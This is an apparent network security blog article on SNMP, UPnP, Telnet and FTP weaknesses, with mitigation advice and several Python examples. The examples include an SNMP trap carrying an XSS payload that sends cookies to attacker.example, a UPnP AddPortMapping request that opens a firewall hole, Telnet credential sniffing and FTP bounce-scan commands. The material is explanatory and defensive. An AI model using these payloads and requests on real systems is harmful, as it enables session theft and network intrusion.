Exploring Vulnerabilities in Network Security
By Abdul Moiz, Executive Director
Do You Understand the Challenges of Network Security?
In 2016, Gartner estimated that 99 percent of exploited vulnerabilities were ones that security and IT professionals had known about for at least one year before the attack, and it expects that pattern to account for the majority of attacks through 2020. At the same time, zero-day attacks and Shadow IT are becoming common challenges because of business expansion and the spread of IoT devices.
In 2015, Symantec counted 54 zero-day vulnerabilities, and attacks using them remain common. Given undiscovered security holes and the growth of internet-enabled devices and business-specific applications, network professionals should expect the scope of zero-day attacks to grow. Shadow IT, which Gartner estimates will be responsible for one-third of successful attacks on enterprises by 2020, also represents a new kind of business challenge for the technology professional.
Network Products With Vulnerabilities That Could Expose Enterprise Security
Network security vulnerabilities affect all levels of software. Here are three recent vulnerabilities:
- SecurityWeek reported that researchers from Positive Technologies identified two critical flaws in Siemens' SICAM Power Automation System (PAS). This scalable, Windows-based software operates and supports electrical substations, which makes it an appealing target for attackers.
- Cisco Talos reported vulnerabilities in Kaspersky security products. One significant flaw let a malicious local application call into the product's API and crash the system, a local denial of service. Kaspersky released patches to address the DoS issues and other concerns.
- The Cure53 audit of cURL reported 23 vulnerabilities, several of them assessed as high severity. That is particularly troubling because cURL and its library libcurl are open-source data transfer components embedded in countless applications and devices, so every product that links them inherits the flaws until it is rebuilt.
What Vulnerabilities Matter to Network Security?
Not all vulnerabilities cause significant damage. The CERT Coordination Center at the Software Engineering Institute; Malik Zakaria, CEO of the managed network company ExterNetworks; SANS, the cooperative research and education organization; and Rapid7, a security assessment company, have each pinpointed the network weaknesses that could compromise a large enterprise network. The most threatening ones lie in the Simple Network Management Protocol (SNMP), Universal Plug and Play (UPnP), the File Transfer Protocol (FTP) and Telnet.
How Insecure Simple Network Management Protocol Is Exploited
According to CERT, vulnerabilities have been reported in many vendors' SNMP implementations, and several of them allow unauthorized access. The Oulu University Secure Programming Group (OUSPG) found numerous flaws in SNMPv1 message handling with its PROTOS test suite, which led to CERT Advisory CA-2002-03. CERT warned that these vulnerabilities could cause service interruptions, unauthorized access to restricted networks, and denial of service.
Exploiting SNMP Vulnerabilities Through Passive and Active SNMP Trap Cross-Site Scripting
Attackers can use SNMP as a delivery channel for stored (passive) cross-site scripting against a web-based network management system (NMS). Many devices ship with the default community strings, public for read access and private for write access. With a writable community string, an attacker or a rogue device on the network sets string-valued MIB objects such as sysName, sysContact or sysLocation to a JavaScript payload. The NMS later polls the device, stores the value, and renders it in its web interface; if the value is not escaped, the script executes in the administrator's browser session and can capture session cookies or administrative data.
The attack works because the NMS trusts what it reads from SNMP agents and passes it to the browser unfiltered. The payload persists on the device, or in the NMS database, until a network administrator or engineer opens the page that displays it; at that moment the script runs with the administrator's privileges in the management system.
The active variant uses SNMP traps. Traps travel over UDP (port 162) and, in SNMPv1 and v2c, carry no authentication beyond the community string, so a rogue device can send bogus trap alerts with a forged source IP address, and a vulnerable NMS accepts and displays them. The script rides in the trap's variable bindings. Default read and write community strings are what make both variants cheap to attempt.
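As an added illustration of the stored and trap-based XSS paths described above (example code written for this page, not taken from CERT, OUSPG or any vendor), the script below builds an SNMPv1 trap whose varbind carries a JavaScript payload, parses it the way a receiver would, and contrasts a web view that inserts the varbind text verbatim with one that HTML-escapes it. It also applies a source and community filter on the receiver. The enterprise OID 1.3.6.1.4.1.99999, the agent address 10.0.0.5 and the host attacker.example are constructed values.

```python
import html
import socket

# Minimal BER/SNMPv1 encoding, enough for a Trap-PDU; not a full SNMP library.

def _ber_len(n):
    """BER length: short form below 128, long form otherwise."""
    if n < 128:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body

def enc_int(v):
    """Non-negative INTEGER; the extra leading byte keeps the sign bit clear."""
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))

def enc_oid(oid):
    parts = [int(p) for p in oid.strip(".").split(".")]
    out = bytearray([40 * parts[0] + parts[1]])
    for p in parts[2:]:                       # base-128, high bit set on all but the last byte
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.insert(0, (p & 0x7F) | 0x80)
            p >>= 7
        out.extend(chunk)
    return tlv(0x06, bytes(out))

def build_v1_trap(community, enterprise, agent_ip, varbinds):
    """SNMPv1 Trap-PDU (RFC 1157) carrying OCTET STRING varbinds; generic-trap 6 = enterpriseSpecific."""
    vbl = b"".join(tlv(0x30, enc_oid(o) + tlv(0x04, v.encode())) for o, v in varbinds)
    pdu = (enc_oid(enterprise)
           + tlv(0x40, socket.inet_aton(agent_ip))         # agent-addr (IpAddress), attacker-chosen
           + enc_int(6) + enc_int(1) + tlv(0x43, b"\x00")  # generic-trap, specific-trap, TimeTicks
           + tlv(0x30, vbl))
    return tlv(0x30, enc_int(0) + tlv(0x04, community.encode()) + tlv(0xA4, pdu))

def _read(buf, pos):
    """Return (tag, body, next_pos) for the TLV starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def dec_oid(body):
    parts, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))

def parse_v1_trap(packet):
    """Receiver side: (community, [(oid, text), ...]) for the string varbinds of an SNMPv1 trap."""
    _, msg, _ = _read(packet, 0)
    _, _, pos = _read(msg, 0)                  # version
    _, community, pos = _read(msg, pos)
    tag, pdu, _ = _read(msg, pos)
    if tag != 0xA4:
        raise ValueError("not an SNMPv1 Trap-PDU")
    pos = 0
    for _ in range(5):                         # skip enterprise, agent-addr, generic, specific, timestamp
        _, _, pos = _read(pdu, pos)
    _, vbl, _ = _read(pdu, pos)
    out, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read(vbl, pos)
        _, oid, p = _read(vb, 0)
        vtag, val, _ = _read(vb, p)
        if vtag == 0x04:                       # OCTET STRING: the type a web UI will display verbatim
            out.append((dec_oid(oid), val.decode("utf-8", "replace")))
    return community.decode("utf-8", "replace"), out

def render_vulnerable(varbinds):
    """What a careless NMS does: device-supplied text straight into the page."""
    return "".join(f"<tr><td>{o}</td><td>{v}</td></tr>" for o, v in varbinds)

def render_hardened(varbinds):
    """Escape everything that came off the wire before it reaches a browser."""
    return "".join(f"<tr><td>{html.escape(o)}</td><td>{html.escape(v)}</td></tr>" for o, v in varbinds)

def accept_trap(src_ip, packet, allowed_agents, trap_community):
    """Receiver policy: drop traps from unknown sources or with the wrong community string.
    UDP source addresses can be forged, so this is filtering, not authentication; SNMPv3
    with authentication is the real fix."""
    community, varbinds = parse_v1_trap(packet)
    if src_ip not in allowed_agents or community != trap_community:
        return None
    return varbinds

# Constructed demo values: hypothetical enterprise OID, agent address and attacker host.
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
TRAP = build_v1_trap("public", "1.3.6.1.4.1.99999", "10.0.0.5",
                     [("1.3.6.1.4.1.99999.1.1", PAYLOAD)])

if __name__ == "__main__":
    _, vbs = parse_v1_trap(TRAP)
    print(render_vulnerable(vbs))   # <script> intact: runs in the administrator's browser
    print(render_hardened(vbs))     # &lt;script&gt;...: shown as harmless text
```

Run as a script, the first line of output contains the raw script tag and the second shows it neutralised. accept_trap only filters: with SNMPv1/v2c the community string crosses the wire in the clear and the UDP source is forgeable, so the escaping in render_hardened is the control that actually stops the XSS.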
Here are Three Security Incidents Involving SNMP and Cross-Site Scripting Flaws
A cross-site scripting flaw of the same class was found in Adobe Connect (not in Flash Player, as sometimes reported). The input validation vulnerability sat in the Connect Events Registration Module and was exploited by attackers before Adobe rolled out a patch. It involved no SNMP, but it is the same pattern: untrusted text reaching an administrative web interface unescaped.
As reported on Threatpost, Matt Austin of Contrast Security found a DOM-based cross-site scripting flaw in Wix.com that let an attacker load malicious JavaScript and have it execute as part of any Wix-hosted website. The flaw had nothing to do with SNMP, but it shows the impact of script running inside a trusted interface: hijacking administrators' browser sessions could have given the attackers full rights over Wix sites and access to customer data such as credit card details.
ExtraBacon, an exploit leaked in 2016 and widely believed to have been developed by the U.S. National Security Agency, targets a buffer overflow in the SNMP code of Cisco ASA software (CVE-2016-6366), which protects corporate networks and data centers. An attacker who can reach the SNMP service and knows the community string can execute code remotely on the device with no further authentication, and the flaw affected a wide range of ASA versions.
Resolutions to Address Flaws in the SNMP Network Protocol
In an article written for Computer Weekly, Chief of Operations at First Base Technologies Peter Wood instructs security engineers to begin with a carefully deployed network device audit to identify possible SNMP network vulnerabilities.
To address general network vulnerabilities, Tom Cross, director of security research at Lancope, suggests locking down services that can be used to launch or amplify a DDoS attack, such as voice over IP, DNS, SNMP and NTP.
Zakaria advises network engineers to inventory every device with SNMP enabled, disable SNMP where it is not needed, and replace the default community strings (public for read-only, private for read-write) on the rest. Firewalls should also block UDP ports 161 (SNMP) and 162 (traps) from external traffic, and where the equipment supports it, SNMPv3 with authentication and encryption should replace SNMPv1 and v2c, whose community strings cross the network in clear text.
Security Vulnerabilities in Universal Plug-and-Play Network Protocols
The UPnP protocol lets various network devices, such as mobile devices, computers and access points, discover each other and exchange data. UPnP offers significant benefits to users, but it also has several security vulnerabilities that could crash a service or leak critical data.
Rapid7 researched UPnP exposure by scanning the internet for devices that answer UPnP discovery requests over five and a half months. The scans found that nearly 17 million systems exposed the UPnP SOAP control API to external networks. The research also reported:
- More than 1,500 vendors and 6,900 products had discoverable flaws.
- More than 23 million systems were vulnerable to a single remote code execution flaw.
- Twenty percent of the 81 million systems that answered discovery requests exposed the SOAP API. This significant flaw could allow attackers to reach and control devices behind a firewall.
Attackers discover UPnP devices with a scanner that sends SSDP discovery requests to UDP port 1900 and reads the replies, which advertise each device's description URL and control services. If an internet gateway device (IGD) exposes its SOAP control interface, the attacker can ask it to add port mappings, opening the perimeter firewall to internal machines and the data on them. Bitdefender found a UPnP flaw that let attackers take control of a user's webcam using its default username, password and device ID.
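An added example (not Rapid7's scanner or any vendor's code) of the discovery and abuse path just described: it builds the SSDP M-SEARCH probe sent to UDP 1900, parses a constructed reply of the kind devices return, flags an advertised libupnp version below 1.6.18 (the fix release for the flaws in Rapid7's paper, used here as an assumption), and shows the SOAP AddPortMapping request that opens a hole through an internet gateway device. The address 192.168.1.1, the control path /ctl/IPConn and the USN in the sample reply are made-up values.

```python
import re
import socket

SSDP_GROUP, SSDP_PORT = "239.255.255.250", 1900

def build_msearch(st="upnp:rootdevice", mx=2):
    """SSDP M-SEARCH: the discovery probe a UPnP scanner sends to UDP 1900."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            f"HOST: {SSDP_GROUP}:{SSDP_PORT}\r\n"
            'MAN: "ssdp:discover"\r\n'
            f"MX: {mx}\r\n"
            f"ST: {st}\r\n\r\n").encode()

def parse_ssdp_response(data):
    """Headers of a device's 'HTTP/1.1 200 OK' reply (names lower-cased), or None if not a reply."""
    lines = data.decode("utf-8", "replace").split("\r\n")
    if not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def libupnp_version(server_header):
    """Version of the Portable SDK (libupnp) advertised in the SERVER header, as a tuple, or None."""
    m = re.search(r"Portable SDK for UPnP devices/(\d+)\.(\d+)\.(\d+)", server_header)
    return tuple(int(x) for x in m.groups()) if m else None

def looks_vulnerable(headers):
    """Assumption used here: libupnp releases before 1.6.18 carry the flaws Rapid7 reported."""
    ver = libupnp_version(headers.get("server", ""))
    return ver is not None and ver < (1, 6, 18)

def build_add_port_mapping(host, control_path, ext_port, int_ip, int_port, proto="TCP"):
    """SOAP AddPortMapping to a WANIPConnection service. No credentials are involved, which is
    why anyone who can reach the control URL can expose an internal machine through the NAT."""
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        '<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        '<NewRemoteHost></NewRemoteHost>'
        f'<NewExternalPort>{ext_port}</NewExternalPort>'
        f'<NewProtocol>{proto}</NewProtocol>'
        f'<NewInternalPort>{int_port}</NewInternalPort>'
        f'<NewInternalClient>{int_ip}</NewInternalClient>'
        '<NewEnabled>1</NewEnabled>'
        '<NewPortMappingDescription>demo</NewPortMappingDescription>'
        '<NewLeaseDuration>0</NewLeaseDuration>'
        '</u:AddPortMapping></s:Body></s:Envelope>')
    return (f"POST {control_path} HTTP/1.1\r\nHOST: {host}\r\n"
            'CONTENT-TYPE: text/xml; charset="utf-8"\r\n'
            f"Content-Length: {len(body)}\r\n"
            'SOAPACTION: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"\r\n\r\n'
            + body).encode()

def ssdp_discover(timeout=2.0):
    """Live discovery on the local network; returns [(ip, headers)]. Not used by the offline demo."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), (SSDP_GROUP, SSDP_PORT))
    found = []
    try:
        while True:
            data, addr = sock.recvfrom(4096)
            headers = parse_ssdp_response(data)
            if headers:
                found.append((addr[0], headers))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found

# Constructed SSDP reply in the format real devices use; every value is made up.
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\n"
                b"LOCATION: http://192.168.1.1:5000/rootDesc.xml\r\n"
                b"SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n"
                b"ST: upnp:rootdevice\r\n"
                b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n\r\n")

if __name__ == "__main__":
    hdrs = parse_ssdp_response(SAMPLE_REPLY)
    print(hdrs["location"], "vulnerable libupnp:", looks_vulnerable(hdrs))
    print(build_add_port_mapping("192.168.1.1:5000", "/ctl/IPConn", 2222, "192.168.1.50", 22).decode())
```

The LOCATION header is what a scanner fetches next: the device description lists the control URL for WANIPConnection, and the AddPortMapping request above, sent to that URL, maps external port 2222 to an internal host's SSH port. Running ssdp_discover on your own network and checking each SERVER header is a quick way to find devices that should have UPnP disabled or replaced.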
Addressing UPnP Protocol Security Vulnerabilities
To address these vulnerabilities, Zakaria suggests that technology professionals disable UPnP on cameras, printers, routers and other network devices for which it is not essential. Businesses can also use a UPnP scanner to find devices with exposed SOAP interfaces and then disable UPnP on the devices it discovers.
H.D. Moore, then CSO of Rapid7, advises in his white paper "Security Flaws in Universal Plug and Play" that companies should replace devices that do not allow UPnP to be disabled. For devices inside the firewall, he recommends contacting the device vendor for an update if a vulnerable UPnP implementation is found.
Serious Threats in the Telnet Protocol and the Incidents They Caused
SANS notes that a Telnet client can connect to any TCP port that has a listener, which makes it a convenient probe for attackers, and that the protocol carries everything, including credentials, in clear text, so Telnet sessions can be sniffed, spoofed and hijacked.
On October 21, 2016, the Mirai botnet caused outages at sites such as Amazon, Twitter and Spotify with a DDoS attack against the DNS provider Dyn. Mirai exploited no flaw in the Telnet protocol itself: it logged in to devices over Telnet with a short list of factory-default credentials. The attack was so effective because of its scale; the botnet is estimated to have controlled 10 percent of U.S. digital video recorders, IP cameras, home-networking gear and other network-connected devices.
Telnet provides remote access through a virtual terminal, and the protocol has no encryption. Anyone who can observe the traffic can read the login credentials and everything typed in the session, and a device shipped with default or hard-coded Telnet credentials can be logged into without any attack on the protocol at all. Clear-text transmission is also a compliance problem for data crossing network devices.
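To make the clear-text problem concrete, here is an added example (written for this page, not taken from SANS or the Mirai source) that strips Telnet option negotiation from a constructed packet capture and recovers the username and password typed during a login. The capture bytes, prompts and credentials are all made up.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE

def strip_telnet_negotiation(data):
    """Application bytes of a Telnet stream with IAC command sequences removed (RFC 854)."""
    out, i, n = bytearray(), 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= n:                       # dangling IAC at the end of a chunk: drop it
            break
        cmd = data[i + 1]
        if cmd == IAC:                       # IAC IAC is an escaped 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):  # IAC <cmd> <option>
            i += 3
        elif cmd == SB:                      # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:                                # other two-byte commands (NOP, GA, ...)
            i += 2
    return bytes(out)

def recover_login(capture):
    """capture: list of ('srv' | 'cli', bytes) segments in wire order, as a sniffer sees them.
    Returns (username, password) typed in the clear, or None if no complete login was seen."""
    expect, user, password, typed = None, None, None, bytearray()
    for side, chunk in capture:
        text = strip_telnet_negotiation(chunk)
        if side == "srv":
            prompt = text.decode("ascii", "replace").lower()
            if "password:" in prompt:
                expect = "password"
            elif "login:" in prompt or "username:" in prompt:
                expect = "user"
            continue
        typed.extend(text)                   # clients often send one keystroke per packet
        while b"\r" in typed:                # Telnet end-of-line is CR LF (or CR NUL)
            line, _, rest = bytes(typed).partition(b"\r")
            typed = bytearray(rest.lstrip(b"\n\x00"))
            value = line.decode("ascii", "replace")
            if expect == "user":
                user = value
            elif expect == "password":
                password = value
            expect = None
    return (user, password) if user is not None and password is not None else None

# Constructed capture of a login to a device with factory credentials (no real traffic).
CAPTURE = [
    ("srv", bytes([IAC, DO, 24, IAC, WILL, 1, IAC, WILL, 3]) + b"\r\nlogin: "),  # DO TERMINAL-TYPE, WILL ECHO, WILL SUPPRESS-GO-AHEAD
    ("cli", bytes([IAC, WONT, 24, IAC, DO, 1, IAC, DO, 3]) + b"a"),
    ("cli", b"dmin\r\n"),
    ("srv", b"admin\r\nPassword: "),         # the server echoes the name but not the password
    ("cli", b"admin\r\n"),                   # ... which is nevertheless on the wire in the clear
    ("srv", b"\r\n$ "),
]

if __name__ == "__main__":
    print(recover_login(CAPTURE))            # ('admin', 'admin')
```

The same logic applied to a real capture (for example, the TCP payloads of port 23 traffic exported from a packet analyser) is all an attacker on the path needs; there is no decryption step because there is nothing encrypted. That, rather than any particular bug, is why the advice below is to turn Telnet off.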
Overcoming Telnet Protocol Security Flaws
Telnet has existed for over 40 years, and its flaws are inherent in its design. Therefore many professionals, such as Tyler Reguly, technical manager of security research and development at Tripwire, recommend turning the protocol off wherever any other means of accessing the system (such as SSH) exists.
Zakaria notes that unencrypted transmission is the defining Telnet flaw, but there are procedures that reduce the risk where the protocol cannot be removed. He suggests a combination of penetration testing, blocking external connection requests, extended protection and patch management. ExterNetworks also publishes case studies showing how vulnerabilities are identified and resolved during a security assessment.
Network Security Pitfalls in the File Transfer Protocol
According to a SANS research paper, FTP may always be a security hole.
By using two channels, control and data, to move unencrypted commands and files between client and server, FTP represents a high security risk. Attacks on FTP aim to breach the targeted server and steal critical data using one of the following approaches:
- FTP Bounce Attack: The attacker abuses the PORT command to make the FTP server open data connections to a third-party host, using the server as a proxy to scan ports or reach systems behind its firewall.
- FTP Brute Force Attack: Repeated login attempts with common or easy-to-guess passwords, which the protocol itself does nothing to slow down.
- Packet Capture: A sniffer records the control and data channels; credentials and file contents are readable after reassembling the stream, since nothing is encrypted.
- Port Stealing: By predicting the next data port the server will use (for example in passive mode), the attacker connects to it before the legitimate client and intercepts or substitutes the transfer.
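An added example, not from SANS or ExterNetworks, that models the control-channel side of the bounce and port-stealing attacks above together with the two server-side checks that stop them: the PORT argument encoding, the commands a bounce scan sends, and a toy FtpSession handler that can run in the classic bounce-prone mode or with the RFC 2577 restrictions. The addresses 203.0.113.10, 198.51.100.7 and 10.0.0.5 are placeholders from documentation ranges.

```python
import secrets

def build_port_arg(ip, port):
    """Argument of the FTP PORT command, h1,h2,h3,h4,p1,p2 (RFC 959)."""
    h1, h2, h3, h4 = (int(x) for x in ip.split("."))
    return f"{h1},{h2},{h3},{h4},{port >> 8},{port & 0xFF}"

def parse_port_arg(arg):
    """Inverse of build_port_arg; raises ValueError on anything malformed."""
    parts = [int(x) for x in arg.split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("malformed PORT argument")
    return ".".join(map(str, parts[:4])), (parts[4] << 8) | parts[5]

def bounce_scan_commands(target_ip, ports):
    """Control-channel traffic of a bounce scan: aim the server's data connection at the victim,
    then request a transfer. A 150/226 reply means the port was open and a 425 that the
    connection failed, so the FTP server ends up port-scanning on the attacker's behalf."""
    return [f"PORT {build_port_arg(target_ip, p)}\r\nLIST\r\n" for p in ports]

class FtpSession:
    """Toy FTP control-channel handler (PORT, PASV, LIST only) showing the server-side checks.
    strict=False reproduces the classic bounce-prone behaviour; strict=True applies RFC 2577."""

    def __init__(self, peer_ip, server_ip="203.0.113.10", strict=True):
        self.peer_ip, self.server_ip, self.strict = peer_ip, server_ip, strict
        self.data_target = None
        self._next_pasv = 1024          # sequential allocator used in the weak mode

    def allocate_pasv_port(self):
        if self.strict:                 # unpredictable port: an attacker cannot pre-connect to it
            return 1024 + secrets.randbelow(65535 - 1024)
        self._next_pasv += 1            # predictable: whoever connects to N+1 first steals the transfer
        return self._next_pasv

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "PORT":
            try:
                ip, port = parse_port_arg(arg)
            except ValueError:
                return "501 Syntax error in parameters"
            # RFC 2577: data connections only back to the control peer, never to a privileged port
            if self.strict and (ip != self.peer_ip or port <= 1023):
                return "500 Illegal PORT command"
            self.data_target = (ip, port)
            return "200 PORT command successful"
        if verb == "PASV":
            port = self.allocate_pasv_port()
            self.data_target = (self.server_ip, port)
            return f"227 Entering Passive Mode ({build_port_arg(self.server_ip, port)})"
        if verb == "LIST":
            if self.data_target is None:
                return "425 Use PORT or PASV first"
            return f"150 Opening data connection to {self.data_target[0]}:{self.data_target[1]}"
        return "502 Command not implemented"

if __name__ == "__main__":
    weak, hardened = FtpSession("198.51.100.7", strict=False), FtpSession("198.51.100.7")
    for cmd in bounce_scan_commands("10.0.0.5", [25]):       # aimed at an internal mail server
        for line in cmd.strip().split("\r\n"):
            print("weak:", weak.handle(line), "| hardened:", hardened.handle(line))
```

In the weak mode the server happily reports "150 Opening data connection to 10.0.0.5:25", that is, it connects to a host the client could never reach directly; the hardened session rejects the PORT with "500 Illegal PORT command" and hands out random passive ports, so neither bounce nor port stealing has anything to work with.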
Addressing FTP Security Flaws
Zakaria notes that adopting SFTP (file transfer over SSH) or FTPS (FTP over TLS) wherever possible and enforcing strong passwords avoids many FTP vulnerabilities.
Rohit Khanna, executive vice president of global strategy and corporate development at SEEBURGER AG, recommends transitioning to managed file transfer (MFT) technology, which avoids several of FTP's security flaws by design.
Proactively Addressing Significant Network Security Flaws
To address the most common network security vulnerabilities, ExterNetworks CEO Malik Zakaria recommends proactively monitoring through a network operations center (NOC) and employing the following best security practices:
- Always change the default credentials of any IoT devices, such as cameras, routers and printers.
- Apply patches to operating systems and other software promptly to reduce the vulnerabilities in an enterprise network. When legacy devices on large networks cannot be patched, network administrators should keep them on their own virtual network to limit what an attacker can reach from them.
- Make sure all passwords follow best security practices to reduce brute force attack vulnerabilities.
- Ensure only the applications that need a port are listening on it, and use a port scanner to find exposed services such as SNMP (UDP 161 and 162) before an attacker does.
- Encrypt transmissions whenever possible. Scan the applications and systems that communicate in clear text.